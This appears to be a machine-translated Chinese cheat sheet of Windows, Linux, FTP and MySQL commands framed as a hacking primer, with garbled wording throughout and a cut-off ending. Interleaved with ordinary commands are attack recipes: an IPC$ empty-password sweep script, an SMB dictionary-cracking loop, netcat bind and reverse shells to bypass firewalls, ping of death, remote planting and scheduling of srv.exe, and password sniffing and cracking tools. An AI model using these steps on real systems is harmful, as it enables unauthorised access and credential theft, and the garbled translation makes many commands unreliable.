Net使用\ \ IP \ ipc $“password“/user:“用戶名“建立IPC非空鏈接。
Net使用H:\ \ IP \ C $“password“/用戶:“用戶名“直接登錄並映射到對方C:在本地是H:
Net使用h: \\ip\c$登錄後映射對方。c:對本地來說,是h;
Net use \\ip\ipc$ /del刪除ipc鏈接。
Net use h: /del刪除從另壹端到名為h的本地映射:
網絡用戶用戶名密碼/添加創建用戶。
網絡用戶來賓/活動:是激活來賓用戶。
Net用戶查看那裏有哪些用戶。
Net用戶帳戶名查看帳戶的屬性。
Net本地組管理員用戶名/add向管理員添加“用戶”以使其具有管理員權限。註意:在管理員後面加上復數s。
Net開始查看哪些服務已打開。
網絡啟動服務名稱啟動服務;(例如網絡啟動遠程登錄、網絡啟動時間表)
網絡停止服務名稱停止服務。
Net time \\目標ip檢查對方的時間。
Net time \\ Target ip /set設置本地計算機的時間以與“目標ip”主機的時間同步,並添加參數/yes以取消確認信息。
Net查看本地局域網中啟用了哪些* * *權限。
Net view \\ip查看對方局域網中啟用了哪些* * *權限。
網絡配置顯示系統網絡設置。
網絡註銷斷開* * *享受
網絡暫停服務名稱暫停服務。
Net send ip“文本消息”向對方發送消息。
網絡中使用的網絡連接類型和信息。
網絡分享查看當地* * *享受。
凈分享ipc$開放ipc$***享受。
凈份額ipc$ /del刪除ipc$***
凈份額c$ /del Delete c: * *享受。
Net用戶guest 12345登錄後,將密碼更改為12345。
Net password密碼更改系統登錄密碼。
Netstat -a查看哪些端口是打開的。經常使用netstat -an。
Netstat -n檢查端口的網絡連接,通常是netstat -an。
Netstat -v查看工作進度
netstat -p協議名稱示例:netstat -p tcq/ip查看協議的使用情況(查看tcp/ip協議的使用情況)。
Netstat -s查看所有正在使用的協議的使用情況。
Nbtstat -A ip從136到139的其中壹個ip端口是開放的,您可以檢查對方最近登錄的用戶名(用戶名在03之前)-註意:參數-A應大寫。
tracert-參數ip(或計算機名)跟蹤路由(數據包),參數:“-w number”用於設置超時間隔。
Ping ip(或域名)向另壹臺主機發送默認大小為32字節的數據。參數是“-l【space】數據包大小“;“-n次發送數據”;“-t”的意思是壹直ping。
Ping -t -l 65550 ip Ping of death(發送大於64K的文件並壹直ping會變成ping of death)。
Ipconfig(winipcfg)用於windows NT和XP(windows 95 98)查看本地ip地址,ipconfig可以使用參數“/all”顯示所有配置信息。
Tlist -t在樹行列表中顯示進程(它是系統的附加工具,默認情況下不安裝,位於安裝目錄的Support/tools文件夾中)。
將-F參數添加到kill -F進程名稱中以強制結束某個進程(它是系統的附加工具,默認情況下不會安裝,位於安裝目錄的Support/tools文件夾中)。
添加-F參數後可以刪除Del -F文件名。/AR、/AH、/AS和/AA分別表示刪除只讀、隱藏、系統和歸檔文件。/A-R、/A-H、/A-S和/A-A表示刪除只讀、隱藏、系統和歸檔文件以外的文件。例如“DEL/AR *。*“表示刪除當前目錄中的所有只讀文件,“DEL/A-S *。*“表示刪除當前目錄中除系統文件以外的所有文件。
第二點:
刪除/S /Q目錄或使用:rmdir /s /Q directory /S刪除該目錄及其下的所有子目錄和文件。同時使用參數/Q取消刪除操作,在系統確認後直接刪除。(兩個命令具有相同的效果)
移動驅動器號\路徑\存儲要移動的文件名的路徑\移動文件名後,使用參數/y取消提示確認移動目錄中存在相同文件並直接覆蓋。
fc one . txt two . txt & gt;3t.txt比較兩個文件並將差異輸出到3t.txt文件。“》”和“》》;這是壹個重定向命令
at id號打開已註冊的計劃任務。
At /delete停止所有計劃的任務,使用參數/yes,無需確認即可直接停止。
在id號/delete處停止已註冊的計劃任務。
查看所有計劃任務。
在\\ip時間程序名稱(或命令)/r在某個時間運行另壹方的程序並重新啟動計算機。
手指用戶名@主機,查看最近有哪些用戶登錄。
Telnet ip端口遠離登錄服務器,默認端口為23。
Open ip連接到IP(telnet登錄後的命令)
Telnet:在這臺機器上直接鍵入telnet將在這臺機器上輸入telnet。
復制路徑\文件名1路徑\文件名2 /y將文件1復制到指定目錄作為文件2,並在您想要覆蓋現有目錄文件的同時使用參數/y取消確認。
復制c:\srv.exe \\ip\admin$將本地c:\srv.exe復制到另壹方的admin。
cppy 1st.jpg/b+2st.txt/a 3st.jpg將2st . txt的內容隱藏到1st . jpg中以在3st.jpg生成壹個新文件。註意:2st.txt文件的頭應該空三行。參數:/b指二進制文件,/a指ASCLL文件。
copy \ \ IP \ admin $ \ svv . exe c:\ or:copy \ \ IP \ admin $ \ *。*將其他admini $ * * *使用的srv.exe文件(所有文件)復制到本地c:
Xcopy文件或目錄樹目標地址\目錄名復制文件和目錄樹,覆蓋同壹個文件而不使用參數/y提示。
Tftp -i自己的IP(當使用肉機作為跳板時使用肉機IP)登錄後獲取server.exe c:\server . exe,將“IP”的server.exe下載到目標主機C:\ server。exe參數:-i表示以二進制模式傳輸,例如傳輸EXE文件時;如果沒有添加-i,則以ASCII模式(傳輸文本文件模式)傳輸。
Tftp -i IP put c:\server.exe登錄並將本地c:\server.exe上傳到主機。
ftp ip端口用於將文件上傳到服務器或執行文件操作。默認端口是21。Bin指二進制傳輸(可執行文件入口);默認情況下,它以ASCII格式傳輸(如果是文本文件)。
路由打印顯示IP路由,主要顯示網絡地址網絡地址、子網掩碼網絡掩碼、網關地址網關地址和接口地址接口。
Arp檢查並處理ARP緩存。ARP表示名稱解析,負責將IP解析為物理MAC地址。Arp -a將顯示所有信息。
啟動程序名稱或命令/max或/min打開壹個新窗口並最大化(最小化)運行壹個程序或命令。
用於檢查cpu使用情況的內存
屬性文件名(目錄名)查看文件(目錄)的屬性。
Attrib文件名-A -R -S -H或+A +R +S +H刪除(添加)文件的存檔、只讀、系統和隱藏屬性。with+作為屬性添加。
查看文件的目錄。參數:/Q顯示文件和目錄屬於哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次訪問時間,/T:W顯示文件上次修改時間。
日期/時間/t使用該參數,即“日期/t”和“時間/T”,將僅顯示當前日期和時間,無需輸入新的日期和時間。
Set指定環境變量名稱=要分配給變量的字符設置環境變量。
Set顯示所有當前環境變量。
Set p(或其他字符)顯示當前以字符p(或其他字符)開頭的所有環境變量。
暫停暫停批處理程序並顯示:請按任意鍵繼續。....
If在批處理程序中執行條件處理(有關更多詳細信息,請參見if命令和變量)
goto標記將cmd.exe指向批處理程序中的標記行(標記必須是單獨的壹行,並以冒號開頭,例如“:start”標記)。
調用路徑\批處理文件名從批處理程序調用另壹個批處理程序(請參見call/?)
For對壹組文件中的每個文件執行特定命令(有關更多詳細信息,請參見for命令和變量)。
回聲打開或關閉打開或關閉回聲,並顯示當前回聲設置,僅顯示回聲而不顯示參數。
回聲信息在屏幕上顯示信息。
回顯信息》》;Pass.txt將“信息”保存到pass.txt文件中。
Find str“Hello“aa.txt在aa . txt文件中查找字符串Hello。
查找文件名查找文件
標題標題名稱更改CMD窗口的標題名稱。
顏色值設置cmd控制臺的前景和背景顏色;0 =黑色,1 =藍色,2 =綠色,3 =淺綠色,4 =紅色,5 =紫色,6 =黃色,7=白色,8=灰色,9=淺藍色,a =淺綠色,B=淺綠色,C=淺紅色,D=淺紫色。
提示名稱更改cmd.exe的顯示命令提示(統壹將C:\ D:\更改為:EntSky\)。
#3三:
Ver在DOS窗口中顯示版本信息。
Winver彈出窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名稱)。
Format letter /FS: type格式化磁盤,類型:FAT、FAT32、NTFS例如:Format D: /FS:NTFS。
Md目錄名稱創建目錄
替換要替換的文件的源文件目錄替換文件
Ren原始文件名新文件名重命名文件名
Tree以樹形結構顯示目錄,第壹個文件夾中的文件名將使用參數-f列出。
類型文件名顯示文本文件的內容。
更多文件名逐屏顯示輸出文件。
Doskey命令鎖定=字符
用於解鎖的Doskey命令=為DOS提供的鎖定命令(編輯命令行、調用win2k命令和創建宏)。例如:lock dir命令:doskey dir=entsky(不能使用doskey dir = dir);解鎖:doskey dir=
Taskmgr調用任務管理器
Chkdsk /F D:檢查磁盤D並顯示狀態報告;添加參數/f並修復磁盤上的錯誤。
Tlntadmn telnt服務admn,鍵入Tlntadmn,選擇3,然後選擇8以將telnet服務的默認端口23更改為任何其他端口。
退出退出cmd.exe程序或目前,使用參數/B退出當前批處理腳本而不是cmd.exe。
路徑路徑\可執行文件的文件名設置可執行文件的路徑。
Cmd啟動win2K命令解釋窗口。參數:/eff,/en關閉和打開命令擴展。見cmd/?
regedit /s註冊表文件名被導入註冊表中;參數/S是指沒有任何提示的安靜模式導入;
Regedit /e註冊表文件名導出註冊表
Cacls文件名參數顯示或修改文件訪問控制列表(ACL)-對於NTFS格式。參數:/D用戶名:設置為拒絕用戶訪問;/P用戶名:perm替換指定用戶的訪問權限;/G用戶名:perm給予指定用戶訪問權限;Perm可以是:N無,R讀,W寫,C改(寫),F完全控制;示例:cacls D:\test.txt /D pub設置D:\test.txt以拒絕pub用戶的訪問。
Cacls文件名查看文件的訪問用戶權限列表。
REM文本內容向批處理文件添加註釋
查看或更改本地網絡配置
#4四:
IIS服務命令:
Iisreset /reboot重新啟動win2k計算機(但有系統將重新啟動的提示)。
Iisreset /start或stop啟動(停止)所有Internet服務。
Iisreset /restart停止並重新啟動所有Internet服務。
Iisreset /status顯示所有Internet服務的狀態。
Iisreset /enable或disable啟用(禁用)本地系統上Internet服務的重新啟動。
Iisreset /rebootonerror啟動、停止或重新啟動Internet服務時,如果出現錯誤,它將重新啟動。
如果無法停止Internet服務,Iisreset /noforce不會強制終止Internet服務。
超時(秒)過期時,Iisreset /timeout Val未停止Internet服務。如果指定了/rebooterror參數,計算機將重新啟動。默認值為重啟20秒、停止60秒和重啟0秒。
FTP命令:(細節稍後給出)
ftp的命令行格式是:
FTP-V-D-I-N-G【主機名】-V顯示遠程服務器的所有響應信息。
-d使用調試模式。
-n限制ftp的自動登錄,即不使用。netrc文件。
-g取消全局文件名。
幫助【命令】還是?【命令】查看命令描述
Bye或quit終止主機FTP進程並退出FTP管理模式。
Pwd列出當前遠程主機目錄。
上傳或發送本地文件名【上傳到主機的文件名】將本地文件發送到遠程主機。
Get或recv【遠程主機的文件名】【下載到本地後的文件名】從遠程主機傳輸到本地主機。
mget【remote-files】從遠程主機向本地主機接收壹批文件。
Mput local-files將壹批文件從本地主機傳輸到遠程主機。
Dir或ls【remote-directory】【local-file】列出當前遠程主機目錄中的文件。如果有本地文件,則將結果寫入本地文件。
Ascii設置文件以ASCII格式發送(默認值)。
Bin或image設置文件以二進制模式發送。
每次完成文件傳輸時,Bell都會發出警報。
Cdup返回到上壹個目錄。
關閉中斷與遠程服務器的ftp會話(對應於打開)
open host【port】建立指定ftp服務器的連接,並可以指定連接端口。
刪除從遠程主機上刪除文件。
刪除壹批文件。
Mkdir directory-name在遠程主機中創建目錄。
重命名【從】【到】更改遠程主機中的文件名。
Rmdir directory-name刪除遠程主機中的目錄。
狀態顯示當前FTP狀態。
系統顯示遠程主機系統類型。
用戶用戶名【密碼】【帳戶】使用不同的用戶名再次登錄遠程主機。
open host【port】重新建立新連接。
提示交互提示模式
Macdef定義宏命令
lcd會更改當前本地主機的工作目錄,如果默認,它將轉到當前用戶的主目錄。
Chmod更改遠程主機的文件權限。
當大小寫處於啟用狀態時,由MGET命令復制的文件名將被傳輸到本地計算機,並且所有文件都將轉換為小寫字母。
Cd remote-dir進入遠程主機目錄。
Cdup進入遠程主機目錄的父目錄。
!在本地機器中執行交互式shell,exit返回ftp環境,例如!ls*。活力
第五名:
MYSQL命令:
Mysql -h主機地址-u用戶名-p密碼連接MySQL;如果MYSQL剛剛安裝,超級用戶root沒有密碼。
(例如:MySQL-h 110.110.1110-urot-p 123456)
註意:u和root可以留空,其他也可以留空)
退出退出MYSQL
Mysqladmin -u username -p舊密碼新密碼更改密碼
授予對數據庫的select權限。*到用戶名@由“密碼”標識的登錄主機;添加新用戶。(註意:與上面不同的是,下面是MYSQL環境中的所有命令,因此它們後面都有壹個分號作為命令終止符。)
顯示數據庫;顯示數據庫列表。壹開始只有兩個數據庫:mysql和test。Mysql庫很重要。它包含MYSQL系統信息。我們實際上是在更改密碼和添加新用戶時使用該庫進行操作。
使用mysql
顯示表格;顯示庫中的數據表
描述表名;顯示數據表的結構
創建數據庫庫名稱;建造圖書館
使用庫名;
創建表表名(字段設置列表);制作手表
刪除數據庫庫名稱;
Drop table表名;刪除數據庫和刪除表
從表名中刪除;清除表中的記錄
Select * from表名;在表中顯示記錄
MySQL dump-opt school & gt;School.bbb備份數據庫:(命令在DOS的\\mysql\\bin目錄下執行);註意:將數據庫school備份到文件school.bbb,這是壹個具有任意文件名的文本文件。打開它,看看妳是否會發現新的東西。
win2003系統下的新命令(實用部分):
shut down/參數關閉或重新啟動本地或遠程主機。
參數描述:/S關閉主機,/R重新啟動主機,/T在0 ~ 180秒範圍內設置延遲時間,/A取消啟動,/m//由IP指定的遠程主機。
示例:shutdown /r /t 0立即重新啟動本地主機(無延遲)
Taskill/parameter進程名稱或進程的pid終止壹個或多個任務和進程。
參數說明:/pid要終止進程的pid,可以使用tasklist命令獲取每個進程的pid,/IM要終止的進程的進程名,/F強制終止進程,/T終止指定的進程及其啟動的子進程。
任務列表顯示當前在本地和遠程主機上運行的進程、服務和服務進程的進程標識符(PID)。
參數說明:/M列出當前進程加載的dll文件,/SVC顯示每個進程對應的服務,如果沒有參數則只列出當前進程。
#6六:
Linux系統下的基本命令:區分大小寫。
Uname顯示版本信息(與win2K版本相同)
Dir顯示當前目錄文件,ls -al顯示隱藏文件(與win2K的dir相同)。
查詢當前目錄位置。
Cd cd..回到上壹個目錄,註意cd和之間有壹個空格...CD/返回根目錄。
卡特彼勒文件名查看文件內容
cat & gtAbc.txt將內容寫入文件abc.txt。
更多文件名逐頁顯示文本文件。
Cp復制文件
Mv移動文件
Rm文件名刪除文件,rm -a目錄名刪除目錄和子目錄。
Mkdir目錄名創建目錄
Rmdir刪除子目錄,並且目錄中沒有文檔。
Chmod設置文件或目錄的訪問權限。
Grep在文件中查找字符串。
差異文件比較
查找文件搜索
日期當前日期和時間。
他詢問當前與您使用同壹臺機器的人以及登錄的時間和地點。
w查詢當前計算機用戶的詳細信息。
請檢查您的帳戶名稱。
群查看某人的群。
Passwd更改密碼
歷史,檢查妳自己的命令。
Ps顯示進程狀態。
Kill停止進程。
Gcc黑客通常用它來編譯用C語言編寫的文件。
Su權限被轉換為指定的用戶。
Telnet IP telnet連接到另壹臺主機(與win2K相同),當出現bash$時,連接成功。
Ftp ftp連接到服務器(與win2K相同)。
附件:批處理命令和變量
1:for命令和變量的基本格式:
FOR/parameter % variable in(set)docommand【command _ parameters】% variable:指定壹個單字母可替換參數,如:%i,並使用:%%i指定壹個變量,並使用:%i%調用該變量,該變量區分大小寫(%i不等於%i)。
批處理壹次可以處理的變量範圍為%0-%9 * * * 10,其中%0默認用於批處理文件名,而%1是使用此批處理時輸入的第壹個值。同樣,% 2-%9是指輸入的第二個到第九個值;示例:netuse \ \ ip \ ipC $ pass/user:用戶中的IP是%1,pass是% 2,用戶是%3。
(set):使用通配符指定壹個文件或壹組文件,例如(D:\user.txt)和(1 1 254)(1-1 254)、{“(1 65438+)“(1-1 254)“說明:從254到1}
命令:指定要在第壹個文件上執行的命令,例如:net use命令;如果要執行多個命令,命令此房間添加:&;分開
Command_parameters:為特定命令指定參數或命令行開關。
IN(set):指IN(set)中的值;DO命令:指執行命令。
參數:/L表示增量形式{(set)是增量形式};/F表示連續從文件中獲取值,直到完成為止{(set)是壹個文件,例如(d:\ pass . txt)}。
用法示例:
@關閉回聲
回顯使用格式:test.bat *。*.*》test . txt
對於/L % % G in(1 1 254),請執行echo %1。% % G & gt& gt測試。& amp凈使用\ \% 1。%% g/user: administrator | find“命令成功完成“》& gt測試。txt
另存為test.bat的說明:依次嘗試為指定C類網段的254個IP建立管理員密碼為空的IPC$連接。如果成功,將IP保存在test.txt中。
/L是指增量形式(即從1-254或254-1);輸入IP的前三位數字:*。*.*是批處理的默認% 1;%%G是變量(ip的最後壹位);& amp用於分隔echo和net use命令;|是指建立ipc$,在結果中用find查看是否有“命令成功完成”的信息;%1.%%G是完整的IP地址;(1 1 254)是指起始值、增長金額和結束值。
@關閉回聲
回顯使用格式:ok.bat ip
對於(D:\user.dic)中的/F %%i,請執行smb.exe % 1% % I D:\ pass . DIC 200
另存為:ok.exe描述:輸入IP後,使用字典文件d:\pass.dic解密d:\user.dic中的用戶密碼,直到該文件中的所有值都被獲取。%%i是用戶名;%1是輸入的IP地址(默認)。
#7七:
2.2:if命令和變量的基本格式:
IF【not】error level數字命令語句如果程序最終返回等於或大於指定數字的退出代碼,則指定的條件為“真”。
示例:IF errorlevel 0命令是指當返回值為0時執行程序後的命令;IF not errorlevel 1命令意味著如果程序執行返回的最後壹個值不等於1,將執行以下命令。
0表示找到並成功執行(true);1表示未找到或未執行(假)。
IF【not】string 1 = = string 2命令語句如果指定的文本字符串匹配(即字符串1等於字符串2),將執行以下命令。
示例:“if“% 2%“=“4“goto start“表示:如果輸入的第二個變量是4,將執行以下命令(註意:調用變量時,% variable name%將添加““)。
IF【not】exist file name命令語句如果指定的文件名存在,將執行以下命令。
例如:“如果沒有nc.exe·格托恩德”的意思是:如果您沒有找到nc.exe的文件,請跳轉到“:結束”標簽。
IF【not】error level數字命令語句else命令語句or IF【not】string 1 = = string 2命令語句else命令語句or IF【not】exist文件名命令語句else命令語句plus:在else命令語句之後,是指前壹個條件不為真時else行之後的命令。註意:else必須在同壹行上才有效。當有del命令時,應該使用del命令的全部內容
(2)系統的外部命令(需要下載相關工具):
1瑞士軍刀:nc.exe
參數描述:
-h查看幫助信息
三維背景模式
-e prog程序重定向,壹旦連接,執行【危險】
isecs延遲時間間隔
-l偵聽模式,用於入站連接
-L監控模式,連接關閉後繼續監控,直到CTR+C。
-n IP地址,不是域名。
-o影片記錄了16的傳輸。
-p【space】port本地端口號
-r隨機本地和遠程端口
-t使用Telnet交互模式。
-u UDP模式
-v詳細輸出,使用-vv會更詳細。
-w數字超時延遲間隔
-z關閉輸入和輸出(當用於掃描錨點時)
基本用法:
NC-NVV 192.168.0.180連接到192 . 168 . 0 . 1主機的80端口。
Nc -l -p 80打開本機的TCP 80端口並監聽。
NC-NVV-W2-z 192.168 . 0 . 180-1024 80-192.168 . 0 . 1用於掃錨。
NC-l-p 5354-t-e c:winntsystem32cmd.exe將遠程主機的cmdshell綁定到遠程主機的TCP 5354端口。
NC-t-e c:winntsystem32cmd.exe 192.168 . 0 . 2 5354設置遠程主機的cmdshell並反向連接192.438+068.0.2的端口5354。
高級用法:
Nc -L -p 80作為蜜罐使用1:打開並不斷偵聽端口80,直到CTR+C。
nc -L -p 80》C:\log.txt作為蜜罐用2打開:並不斷監聽端口80直到CTR+C,同時將結果輸出到c: \ log.txt。
NC-L-p 80 & lt;C:\honeyport.txt作為3-1的蜜罐:打開並不斷監聽80端口,直到CTR+C,並將c:\honeyport.txt中的內容發送到管道中,這也可以起到傳輸文件的作用。
Type.exe C:\ honey port | NC-L-P 80被用作蜜罐。3-2:打開並不斷監聽80端口直到CTR+C,將c:\honeyport.txt中的內容發送到管道中,也可以起到傳輸文件的作用。
對於本機器:nc -l -p本地端口。
在另壹臺主機上:NC-e cmd.exe本地IP -p本地端口*win2K。
Nc -e /bin/sh本地IP -p本地端口*linux、unix反向連接突破對方主機的防火墻。
本機使用:nc -d -l -p本地端口
在另壹臺主機上:nc -vv本地IP本地端口》;存儲文件的路徑和名稱。將文件發送到另壹臺主機。
註意:
管道命令
& lt或》重定向命令。“<,例如:tlntadmn《Test.txt是指將test . txt的內容分配給tlntadmn命令。
@表示執行@後面的命令,但不會顯示(後臺執行);示例:@ @ dir c:\ win nt》& gt;D:\log.txt的意思是:dir在後臺執行,結果存儲在D: \ log.txt中。
& gtwith》》;“》”的區別是指:覆蓋;“& gt》;指保存到(添加到)。
例如:@ dir c:\ win nt》》;D:\log.txt和@dir c:\winnt》兩個命令d:\log.txt比較兩次:use》;& gt目的是保存所有次要結果,並使用:》只有壹個結果,因為第二個結果覆蓋了第壹個結果。
#8八:
2.掃錨工具:xscan.exe。
基本格式
xscan-host & lt;起始IP & gt【-& lt;終止IP & gt】& lt測試項目》【其他選項】掃描錨點“起始IP到結束IP”部分的所有主機信息。
xscan -file <主機列表文件名》測試項目》【其他選項】掃描錨中的所有主機信息“主機IP列表文件名”
試驗項目
-active檢測主機是否處於活動狀態。
-操作系統檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port檢測常用服務的端口狀態。
-ftp檢測ftp弱密碼
-pub檢測FTP服務的匿名用戶的寫權限。
-pop3檢測pop 3-服務器弱密碼
-smtp檢測smtp服務器漏洞
-sql檢測SQL-Server弱密碼
-smb檢測到NT-Server弱密碼。
-iis檢測到iis編碼/解碼漏洞。
-cgi檢測cgi漏洞
-nasl加載Nessus攻擊腳本
-all檢測以上所有項目。
其他選項
-i適配器號設置網絡適配器,可以通過“-l“參數獲得。
-l顯示所有網絡適配器。
-v顯示詳細的掃描進度。
-p跳過無響應的主機。
-o跳過未檢測到開放端口的主機。
-t number of concurrent threads,number of concurrent hosts指定並發線程的最大數量和並發主機的數量,默認數量為100和10。
-日誌文件名指定掃描報告的文件名(後綴為:TXT或HTML格式的文件)。
用法示例
xscan-host 192 . 168 . 1-192 . 168 . 255 . 255-全主動害蟲檢測+092 . 599999999909096
xscan-主機192.168.1-192.168 . 255 . 255-端口-SMB-T150-O檢測192。168.255.255網段內主機的標準端口狀態,nt弱密碼用戶,最大並發線程數為150,跳過沒有開放端口的主機。
xscan-file hostlist.txt-port-CGI-t200,5-v-o檢測“hostlist . txt”文件中列出的所有主機的標準端口狀態以及CGI漏洞。最大並發線程數為200,最多同時檢測5臺主機,顯示詳細檢測進度,並跳過未檢測到開放端口的主機。
#9九:
3.命令行嗅探器:xsniff.exe。
可以捕獲局域網中FTP/SMTP/POP3/HTTP協議的密碼。
參數描述
-tcp輸出tcp數據報
-udp輸出udp數據報
-ICMP輸出ICMP數據報
-傳遞過濾器密碼信息。
-隱藏後臺運行
-host解析主機名。
-addr IP地址過濾器IP地址
-端口端口過濾器端口
-log filename將輸出保存到文件中。
ascII格式的ASC輸出。
-十六進制形式的十六進制輸出16。
用法示例
xsniff . exe-pass-hide-log pass.log在後臺運行嗅探密碼,並將密碼信息保存在pass . log文件中。
xsniff . exe-tcp-udp-ASC-ADR 192.168.1嗅探192.168.1並過濾TCP和UDP信息並以ASCII格式輸出。
4.終端服務密碼破解:tscrack.exe。
參數描述
-h顯示幫助。
-v顯示版本信息。
-s在屏幕上播放解密的能力
-b密碼錯誤時的聲音。
-t是發送多個連接(多個